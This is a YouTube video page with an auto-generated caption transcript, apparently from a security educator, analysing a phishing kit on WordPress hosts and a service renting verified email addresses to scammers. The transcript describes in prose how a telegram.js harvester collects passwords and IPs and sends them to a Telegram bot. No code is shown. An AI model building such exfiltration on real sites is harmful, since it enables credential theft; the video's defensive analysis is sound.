Now Scammers Can RENT Email Addresses for Cybercrime

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

these are scam websites that have been taken down by an administrator at a WordPress hosting provider in the last year these are fake websites with a login form to either collect and harvest credentials like a username or password or set up fake donation Pages where it can scam and grift for money right off the tales of yesterday's video where we got to dive into a phishing email that had a fake online Microsoft cloud or o365 login that would Harvest credentials and send it to a compromised WordPress website this individual reached out to me over email and said hey check it out this is some of the back end stuff that we tend to see at these WordPress hosting providers how scammers retrieve and exfiltrate credentials now I am super duper grateful for this individual sharing this with me I thought it was really cool to be able to see behind the scenes pull back the curtain and I asked hey are you comfortable with me showcasing this in a video and again thank you they said of course absolutely so these are some of the commands that they ran on their server we can see sort of like a bash Linux prompt here maybe the host name game under WordPress and code for that specific instance or website they're listing out the files in the current directory and of course regular index.html page or maybe a maybe a fake pin uh code authentication like multi-factor authentication the zip file for presumably the whole website itself and other content But ultimately a telegram.js file you can probably see where we're going with this this telegram.js file is Javascript code or code that may usually run a client-side when your web browser like Firefox or Google Chrome renders a page inside of the web browser and it will just dynamically execute other code to make other requests or to interact with other parts of the page or other websites or it can be ran server side with like node.js or Express as a web application framework but in this case it looks like this syntax indicates it is running as client-side code which is odd to me because look they straight up store a telegram bot ID for the bot the robot the account that they're going to automate sending and exfil trading credentials like stolen username and password to a specific chat or one location will cross Telegram and all that messaging that it makes sense of with the ready function they go ahead and retrieve a couple variables that they've already declared and retrieve them from IDs or values set in the HTML of the web page and they start to build out a message that concatenates all this together like the user that's provided their password that they supplied and the IP address that they're coming from we set this up in local storage and then ultimately there is a sender function where hey once the page is ready we've collected and stored all of those credentials variables that we want to work with we take a couple settings where we say look Let's do an asynchronous request cross domain doesn't matter to me but I want to use the telegram API to retrieve a unique specific bot of course this is the threat actor this is the hacker this is the scammer setting up their telegram bot and sending a message posting with all the data that they've just stolen retrieved as part of that message variable easy enough they end up just sending it doing what they do and redirecting with the little location.href interesting they do another bit here I presume hey this ready one might again just be for a pin or a multi-factor authentication thing that they're trying to fake and they do this all over again hey another sender one function where they concatenate in their telegram bot ID and send along the message for the access but this is pretty cut and dry right like you know how a credential Harvester works I'm sure we've seen these all over the place before and that might be nothing new to you but this WordPress administrator clued me in on something really cool that I haven't seen or heard of before probably because it's just so dang recent and oh actually while we've been doing a little bit of code review digging into the syntax digging into this JavaScript language I think it would be appropriate and please allow me to give some love and support to today's sponsor sneak I'll be honest I write bad code even though I try to hunt for vulnerabilities and lots of other software I still have gone abilities even in my own projects everyone does and that's why I use sneak to scan for vulnerabilities in code dependencies containers and configuration files and sneak helps find and fix those vulnerabilities in real time you can try it and see for yourself you can sign up for free with my link below import your repositories and sit back and let sneak do the work for you it'll find the flaws and vulnerabilities in your own applications check out this prototype pollution vulnerability that sneak uncovered we can see more details about the code path to introduce this vulnerability and even learn more about this kind of vulnerability or any others if you check out the sneak learn lesson I've referenced the sneak learn lessons and their vulnerability database a ton especially in assessments and penetration testing and even during Capture the Flag competitions from there you can see an explanation of a flaw proof of concept exploit code and attack demonstrations and most importantly how to mitigate this vulnerability but the best part sneak helps you fix this vulnerability with a single click it'll automatically open a pull request so you can just merge and move on so seriously check out sneak it's crazy how many vulnerabilities could be affecting your projects and you don't even realize take advantage of the resources and learning material and learn all about the different vulnerabilities out there it's completely free and you can sign up right now with my link in the video description huge thanks to sneak for sponsoring this video they told me that these scammers and credential Harvesters will sign up for 20 or 80 or hundreds and tons of websites a day with their free trial so that they can Mass deploy tons of these Bots or credential Harvesters and keep up the campaign but the way that they do that is by bypassing a lot of the email verification or capture mechanisms that are put in place with some sweet potential new services that really help that out and they referenced this article from Brian Krebs one of the other cyber security reporters and he was chatting about on June 6th very very recent one of the most expensive aspects of any cyber criminal operation is the time and effort it takes to constantly create large numbers of new throwaway email accounts so we can rapidly sign up for online services like Facebook LinkedIn I don't know of course telegram right but a new service offers to help dramatically cut these costs associated with this large-scale mouse spam and account creation campaigns just pressing the easy button so that they can do more damage as cyber criminals as scammers as hackers and threat actors they note this new thing copichka dot store is a sort of unidirectional email confirmation as a service that says hey we'll speed run this whole thing for you of course it's sold as a hey business operations something as a service that is managed for you and it's meant to be easy peasy it's supposed to take all the hard work out for you the way that this works is that kopicha collects archives and offers multiple email addresses that have already been validated and when you select or choose one to use for your own bidding you'll specify with whatever API keys and tokens like hey I want this one and I'm going to use it for this website or service like Twitter or Macedon VK anything and then copichka will match whatever new confirmation links or validation or verification comes through and it will forward it along to your provided Gateway this way kopicha customers never get access to the original real raw email their inbox but they can forward anything that they want into their own in control with that kopicha can rent out whatever email addresses they want to multiple customers the thing is this is very common like this is the norm they talk about this one case study with quote PW who was mass registering accounts on Mastodon in this case uh another online service like Twitter or whatever they were when we had the giant Twitter Exodus and everyone went to Mastodon you know the drill but they're chatting about like hey suddenly there were hundreds of account creation new registration new sign up and this is all coming from quote pwspam.net which was since released as open source like apparently they just put it out on GitHub and that was an API call to KO Peach cause service they chat about this a little bit more and that some other case studies were using I don't know scams will be able to help promote cryptocurrency and all of the other shenanigans that come from that and of course scamdoc.com on their website that mimics legitimate scamdoc.com for measuring the trustworthiness and authenticity of various websites that is just another other hook and lore and Ploy and lie and deception a really interesting tidbit here hey they note according to the FBI federal bureau investigations Financial losses from cryptocurrency Investments dwarfed losses for all other types of cyber crime in 2022. rising from 907 million in 2021 to two and a half billion dollars last year this is that link to the FBI's report on that this is coming from March of 2023 and it's kind of wild to see these numbers between business email compromise investment fraud tech support like hey you get some email from Best Buy and Geek Squad saying you need to update your antivirus crap like that you could dig into more of the report here if you wanted to but it is just mind-blowing to me and it's crazy how TurnKey this has all become and in case you're curious this is kopichka this is the kopichka store uh Hey Okay automatically detecting the language here for me save your time and money for successfully registering multiple accounts so you can do more damage and this is exactly the screenshot that Brian Krebs has included hey hey this is the about us and what we offer we provide email accounts Supply unique photos and issue phone numbers for registration so you can have the easy button for mass sign up of anything accounts new registrations for any website you might want whether it's telegram whether it's these WordPress providing hosts whether it's YouTube whether it's VK whether it is Mastodon all of these with of course testimonials and reviews and everything that is genuinely in a real business because that's what it is it is a commoditized Enterprise industry and Marketplace for cyber crime man now I'm not gonna sign up for copichka DOT store right now but hey I would love to maybe ask for an exercise to the reader especially I don't know maybe some of the telegram bot stuff here is there anything more that you might be able to dig into about this unique specific telegram bot can we track down all the shenanigans that they're up to maybe we could get a little bit more details on what their operation might be what could we do to better security here hey huge kudos to the individual that had reached out thank you so much and especially thank you to the administrator for this WordPress hosting provider and all of the administrators for WordPress hosting providers you are literally doing the internet the greatest service and locking this stuff down trying to go out and fight the good fight here they say look they're hosting tens of thousands of websites every day and when just we're playing whack-a-ball with these spam accounts that are rapidly being created it is a valued effort and thank you for doing it with that it's up to us to keep getting this education and awareness and messaging out there so that folks are aware and we can fight the good fight just as well get in the front lines be in the trenches and maybe do anything that we can about these telegram Bots credential harvesting better security thanks so much for watching I hope you enjoyed this video I thought it was kind of neat to get a look behind the curtain and thanks again to all the folks that were willing to do this and help out like comment subscribe YouTube algorithm stuff I'll see in the next video

Info

Channel: John Hammond

Views: 37,339

Rating: undefined out of 5

Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners

Id: O36COhOWFg0

Channel Id: undefined

Length: 11min 30sec (690 seconds)

Published: Fri Jun 09 2023